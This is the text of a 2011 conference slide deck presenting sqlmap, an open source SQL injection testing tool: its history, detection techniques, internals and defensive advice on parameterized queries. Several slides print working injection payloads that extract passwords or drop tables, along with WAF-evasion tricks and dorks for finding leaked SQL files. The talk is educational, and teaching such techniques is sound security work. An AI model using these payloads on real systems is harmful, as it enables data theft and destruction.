sqlmap - security development in

Miroslav tampar

Who are we?

Bernardo Damele A. G. (@inquisb)
Security Consultant / White-hat hacker NGS Secure London / UK Lots of conference talks

Miroslav Stampar (@stamparm)

Professional software developer AVL Croatia Zagreb / Croatia First conference talk
EuroPython 2011, Florence (Italy) June 23, 2011 2

What is sqlmap?
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database server(s) AIO (All-In-One) SQL injection tool Over 10k updates and/or downloads monthly Part of popular security distros: Backtrack, Backbox, Web Security Dojo, OWASP Web Testing,...

EuroPython 2011, Florence (Italy)

June 23, 2011

Short history
Daniele Bellucci (@belch) July 25th of 2006 birthday of sqlmap September 2006 Daniele leaves the project, Bernardo takes it over December 2009 Miroslav replies to the call for developers

EuroPython 2011, Florence (Italy)

June 23, 2011

Current status (v1.0-dev)

Powerful detection engine State of the art enumeration engine Takeover functionalities (Metasploit,...) Support for IDS/WAF evasion in form of tampering scripts Numerous optimizations Remote file manipulation Brute force methods

EuroPython 2011, Florence (Italy)

June 23, 2011

Short future
GUI Professional reporting (XML, PDF,...) Out-of-Band (OOB) advanced techniques Support for few DBMSes left Generic lexical SQL parser Advanced IDS/WAF evasion techniques Upgrade to Python 3

EuroPython 2011, Florence (Italy)

June 23, 2011

Project statistics (ohloh.net)

Languages used

LOC (Lines of code)

EuroPython 2011, Florence (Italy)

June 23, 2011

Features
Fully supported backend DBMSes (and growing): MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB Fully supported SQL injection techniques: Blind, Error, Union (partial & full), Timed, Stacked Enumeration of: database users, users' password hashes, users' privileges, users' roles, databases, tables and columns

EuroPython 2011, Florence (Italy)

June 23, 2011

Features (2)
Recognition and cracking of password hashes Web server file upload/download Arbitrary command execution and retrieval of standard output Establishment of an out-of-band TCP/UDP connection between the attacker's machine and the database server

EuroPython 2011, Florence (Italy)

June 23, 2011

Community
Huge pool of pen/beta-testers active at our mailing list (this moment 200 subscribed) White/Grey/Black hat hackers They all provide indispensable help by:
Reporting problems/bugs from real-life scenarios Feature requests Keeping morale high Modest donations (covering SVN server costs)

EuroPython 2011, Florence (Italy)

June 23, 2011

10

SQL injection for dummies

Vulnerable code (PHP/PgSQL):
$query = "SELECT * FROM products WHERE product_id=" . $_GET['id']

Attack vector:
http://www.store.com/store.php?id=7; DROP TABLE users

Resulting SQL statements:

SELECT * FROM products WHERE product_id=7; DROP TABLE users

EuroPython 2011, Florence (Italy)

June 23, 2011

11

Well known attacks

In period 2005 till 2007 Albert Gonzalez has stolen 130 million credit card numbers June 2007 Microsoft U.K. Website defaced December 2009 RockYou (32 million credentials stolen) December 2009 NASA July 2010 The Pirate Bay

EuroPython 2011, Florence (Italy)

June 23, 2011

12

Well known attacks (2)

February 2011 HBGary March 2011 MySQL (vulnerable page has been:
http://mysql.com/customers/view/index.html?id=1170

March & May 2011 Comodo (certificate reseller) May 2011... PBS, Sony (#sownage 20 sites and counting), Fox, Infragard, Nintendo, CNN...

EuroPython 2011, Florence (Italy)

June 23, 2011

13

Lizamoon (mass injection)

LizaMoon mass injection hits over 226,000 URLs Websense Security Labs (29th Mar 2011) The world was rocked today by LizaMoon - a SQL injection attack which has compromised well over one million Websites PCWorld (2nd Apr 2011)

EuroPython 2011, Florence (Italy)

June 23, 2011

14

Random Quote

Structured Query Language is becoming the Achilles heel of the Internet.

EuroPython 2011, Florence (Italy)

June 23, 2011

15

Exploits of a Mom (XKCD #327)

EuroPython 2011, Florence (Italy)

June 23, 2011

16

Funny Sweds
The following lines were in Swedish election votes (swe. VALJ = engl. voting): ;13;Hallands ln;80;Halmstad;01;Halmstads vstra valkrets;0904;Sndrum 4;pwn DROP TABLE VALJ;1 At least 'pwn DROP TABLE VALJ' got 1 vote in the Swedish election (comment on reddit :)

EuroPython 2011, Florence (Italy)

June 23, 2011

17

 - SQL
Awkward Russian underground (open) forum No chat, only vulnerable targets Around 14 thousand targets (and growing) available to anyone

EuroPython 2011, Florence (Italy)

June 23, 2011

18

Blind-based technique
Also known as boolean based and/or 1=1 4 out of 5 vulnerable cases are affected Slow 1 request per 1 bit of information Very demanding and sensitive for implementation (detection part) Differentiation approach (difflib.quick_ratio()) or exact approach (e.g. You are logged in in page) Greatest obstacle is dinamicity Multi-threading is most welcome
EuroPython 2011, Florence (Italy) June 23, 2011 19

Blind-based technique (2)

Original

True

False

EuroPython 2011, Florence (Italy)

June 23, 2011

20

Error-based technique
1 out of 4 vulnerable cases are affected Deliberate provoking of invalid SQL query and retrieval of information from response messages Fast 1 request per item of information Easy detection and implementation Greatest obstacle is trimming of error messages (substringing) Too DBMS specific Advice: Turn off the error/debug messages!
EuroPython 2011, Florence (Italy) June 23, 2011 21

Error-based technique (2)

Example:

EuroPython 2011, Florence (Italy)

June 23, 2011

22

Union query technique

Also known as inband 1 out of 2 vulnerable cases are affected Fast(est) 1 request per (multiple) item of information Partial vs Full union Greatest obstacle is speed of detection part Easy for implementation, at least for usage part

EuroPython 2011, Florence (Italy)

June 23, 2011

23

Union query technique (2)

Example 1 (partial):

Example 2 (full):

EuroPython 2011, Florence (Italy)

June 23, 2011

24

Time delay-based technique

Pretty much the same as blind-based Among slowest 1 request per 1 bit of information Expect every second response to be delayed Very demanding and sensitive for implementation Greatest obstacle is lagging Single threading is a must for stable data retrieval

EuroPython 2011, Florence (Italy)

June 23, 2011

25

Time delay-based technique (2)

Example (delayed by 5 seconds):

Resulting SQL statement: SELECT * FROM users WHERE id=1 AND 1=\ (SELECT 1 FROM PG_SLEEP(5))--

EuroPython 2011, Florence (Italy)

June 23, 2011

26

Stacked query technique

Pretty much identical to the time-based Around 1 out of 2 DBMSes supports it Deadly (Lizamoon) MsSQL is most affected Non-query based commands (INSERT, DELETE,...)

EuroPython 2011, Florence (Italy)

June 23, 2011

27

Stacked query technique (2)

Example (delayed by 5 seconds)

EuroPython 2011, Florence (Italy)

June 23, 2011

28

Basic working examples

Blind-based: ...id=1 AND ASCII(SUBSTR((SELECT
password FROM public.users OFFSET 0 LIMIT 1)::text,1,1)) > 64--

Error-based: ...id=1 AND 6561=CAST(':abc:'||

(SELECT password FROM public.users OFFSET 0 LIMIT 1)::text||':def:' AS NUMERIC)--

Union query: ...id=1 UNION ALL SELECT NULL,

NULL,':abc:'||password||':def:'||':ghi:'|| password||':jkl:'||':mno:'||id||':pqr:' FROM public.users--

EuroPython 2011, Florence (Italy)

June 23, 2011

29

Basic working examples (2)

Time-delay based: id=1 AND 1924=(CASE WHEN
(ASCII(SUBSTR((SELECT password FROM public.users OFFSET 0 LIMIT 1)::text,1,1)) > 64) THEN (SELECT 1924 FROM PG_SLEEP(1)) ELSE 1924 END)--

Stacked query: id=1; SELECT(CASE WHEN

(ASCII(SUBSTR((SELECT password FROM public.users OFFSET 0 LIMIT 1)::text,1,1)) > 64) THEN (SELECT 1924 FROM PG_SLEEP(1)) ELSE 1924 END);--

EuroPython 2011, Florence (Italy)

June 23, 2011

30

Program's structure
doc manual, THANKS,... lib core modules extra 3rd party modules (chardet, clientform,...) plugins DBMS specific modules shell stagers and backdoors (php, jsp, asp,...) tamper tampering scripts (ifnull2ifisnull,...) txt wordlist, user-agents,... xml queries, payloads,...
EuroPython 2011, Florence (Italy) June 23, 2011 31

Program's workflow
Setup Detection
Fingerprinting Enumeration

Takeover

Configuration

Boolean Error Union Timed Stacked

MySQL MsSQL PgSQL Oracle MsAccess ...

Databases Tables Columns Users Passwords ...

Web shell Metasploit ICMPsh File access Registry ...

Knowledge base Session Connection Payloads Queries

... EuroPython 2011, Florence (Italy)

June 23, 2011

32

Development environment
Subversion (version control) Redmine (project management) Python 2.6 and/or 2.7 Text editor of choice (TC/Notepad++ on Windows, Krusader/KrViewer on Linux) Debugger of choice (pdb) Proxy MITM tool (Burp) Web browser of choice (Firefox)

EuroPython 2011, Florence (Italy)

June 23, 2011

33

Testing environment
VMWare virtual machines Linux Debian 5.0 32-bit (most used one)
Apache/PHP
MySQL, Oracle, PgSQL, Firebird, SQLite

Windows XP 32-bit
XAMPP/PHP
MySQL, SAP MaxDB, Sybase, SQLite, Access, etc.

IIS/ASP(.NET)
MsSQL, MySQL, etc.

EuroPython 2011, Florence (Italy)

June 23, 2011

34

Inference (binary search)

O(Log2n) complexity Can be used in boolean, timed and stacked e.g.:
Initial table AND (...) AND (...) AND (...) AND (...) AND (...) char) ['A','B',...'Z'] > 'M' (True) ['N',...'Z'] > 'S' (False) ['N',...'S'] > 'O' (True) ['P', 'R', 'S'] > 'R' (False) ['P', 'R'] > 'P' (False) ['P'] (resulting

EuroPython 2011, Florence (Italy)

June 23, 2011

35

Character prediction
High probability of prefix reuse Common DBMS identificator names Dynamic prediction tree Example:
Input: CREATE SYNONYM, CREATE TABLE, CREATE TRIGGER, CREATE USER, CREATE VIEW Output tree: [C][R][E][A][T][E][S|T|U|V]

Appropriate for blind/time/stacked techniques

EuroPython 2011, Florence (Italy)

June 23, 2011

36

Null-connection
Special HTTP requests (Web server specific) Example (Apache):
Request: Range: bytes=-1 Response: Content-range: bytes 74-74/75 (True) Response: Content-range: bytes 126-126/127 (False)

Example (IIS):
Request: HEAD Response: Content-Length: 75 (True) Response: Content-Length: 127 (False)
EuroPython 2011, Florence (Italy) June 23, 2011 37

Dinamicity removal
Biggest obstacle of blind/boolean technique Javascript, ads, banners,... Differentiation approach (difflib) Static blocks vs Dynamic blocks (gaps) Regular expressions to the rescue Example:
</p></table>dynamic part<iframe><ul> r</p></table>.*?<iframe><ul>

EuroPython 2011, Florence (Italy)

June 23, 2011

38

Reflective values
Copy of payload (encoded?) inside response Causing problems for blind/boolean technique Source of lots of false positives/negatives (in other tools :) Regular expressions to the rescue Example:
?id=1 AND 2>1 ?id=1%20AND%202%3e1 r(?i)id[^\n<]+1[^\n<]+AND[^\n<]+2[^\n<] +1
EuroPython 2011, Florence (Italy) June 23, 2011 39

Statistics is our friend

Normal distribution (bell curve)

EuroPython 2011, Florence (Italy)

It shows how much variation or 'dispersion' there is from the average (mean, or expected value) 99.9999999997440% of normal data inside 7
June 23, 2011

40

Statistics is our friend (2)

UNION injection detection:
id=1 UNION ALL SELECT NULL, NULL,... Right number of columns should stick out

Time-delay injection detection/usage:

id=1 AND 1=SELECT 1 FROM PG_SLEEP(5))-Response time should stick out

Stacked-query injection detection/usage:

id=1; SELECT 1 FROM PG_SLEEP(5))-Response time should stick out

EuroPython 2011, Florence (Italy)

June 23, 2011

41

False positives
Boolean, timed and stacked affected Example: search engine queries Simple arithmetic tests Searching for mere signs of intelligence Example:
1+2==3 4==5 2==(7-5) (6+5)==(6-5)

EuroPython 2011, Florence (Italy)

June 23, 2011

42

Heuristic test
Blatant logic used for detection Insufficient but great one shot test Parameter poisoning with invalid (SQL) chars Example:
?id=1''))((''(

Error message parsing and DBMS recognition

EuroPython 2011, Florence (Italy)

June 23, 2011

43

Tampering scripts
IDS/WAF applications are getting better Need for anti-anti hacking techniques Example:
'UNION SELECT' 'UnIOn SeleCT' 'A>B' 'A NOT BETWEEN 0 AND B' 'SELECT password' 'SELECT/**/password'

Input: payload Output: ftamper(payload) Order of appearance & prioritized 14 till now and counting Automation in near future
EuroPython 2011, Florence (Italy) June 23, 2011 44

Pivoting
Dumping technique When lacking LIMIT/OFFSET mechanism Around 1 in 2 DBMSes affected (e.g. MsSQL) Count number of DISTINCT values Choose column with highest number as pivot Pivoting:
SELECT MIN(pivotCol) WHERE pivotCol > <previous_pivot_value> SELECT otherCol WHERE pivotCol = <current_pivot_value>
EuroPython 2011, Florence (Italy) June 23, 2011 45

SQL harvesting
Google is our friend
filetype:sql "CREATE TABLE" filetype:sql "INSERT INTO"

Extraction of table and column names Decision based on frequency Gathered data used by (brute force switches):
--common-tables
...AND EXISTS(SELECT * FROM table)

--common-columns
...AND EXISTS(SELECT column FROM table)
EuroPython 2011, Florence (Italy) June 23, 2011 46

Hash cracking
Implemented DBMS specific hash functions 10 and counting (mysql_passwd, mysql_old_passwd, mssql_passwd, ...) Regular expression based recognition High-quality (10MB) dictionary/wordlist Automatic brute-force approach Blazing fast (core routines from hashlib)

EuroPython 2011, Florence (Italy)

June 23, 2011

47

Quality tests
--live-test

All relevant tests for 4 major DBMSes Batch-like workflow Declared in a structured XML file Run against testing VMs
--smoke-test

Recursively finds all modules Tries importing every single one of them Runs doctests if explicitly written
./extra/shutils/pylint.py

EuroPython 2011, Florence (Italy)

June 23, 2011

48

Best self-protection advice

...you can get from a dude that makes this all anti WAF/IDS, statistics, pivoting, dynamicity, reflective values and similar mambo-jambo...

EuroPython 2011, Florence (Italy)

June 23, 2011

49

Parametrized SQL statements

Don't sanitize your database inputs yourself (prone to errors!) Use language/library specific parametrized SQL statements Functions/libraries automatically sanitize provided parameters Good reference: http://bobby-tables.com/

EuroPython 2011, Florence (Italy)

June 23, 2011

50

Parametrized SQL statements (2)

Example (Python DB API):
Don't:
cmd = "UPDATE people SET name='%s' WHERE id='%s'" % (name, id) cursor.execute(cmd)

Instead:
cursor.execute('UPDATE people SET name=:1 WHERE id=:2', [name, id])

EuroPython 2011, Florence (Italy)

June 23, 2011

51

Questions?

EuroPython 2011, Florence (Italy)

June 23, 2011

52

Join the project

Project's web page:
http://sqlmap.sourceforge.net/

Contact:
dev@sqlmap.org

Users list:
sqlmap-users@lists.sourceforge.net

Twitter:
@sqlmap

Repository:
https://svn.sqlmap.org/sqlmap/trunk/sqlmap
EuroPython 2011, Florence (Italy) June 23, 2011 53